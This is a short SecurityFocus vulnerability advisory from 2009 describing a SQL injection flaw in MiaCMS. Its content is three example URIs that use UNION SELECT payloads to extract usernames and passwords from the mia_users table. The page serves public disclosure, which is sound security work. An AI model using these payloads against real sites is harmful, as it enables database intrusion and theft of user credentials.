Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

MiaCMS 'mod_socialbits.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs have been provided:

http://www.example.com/index.php?option=com_content&task=view&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=9

http://www.example.com/index.php?option=com_content&task=category&sectionid=doktor&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=27

http://www.example.com/index.php?option=com_content&task=blogsection&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=9







 

Privacy Statement
Copyright 2009, SecurityFocus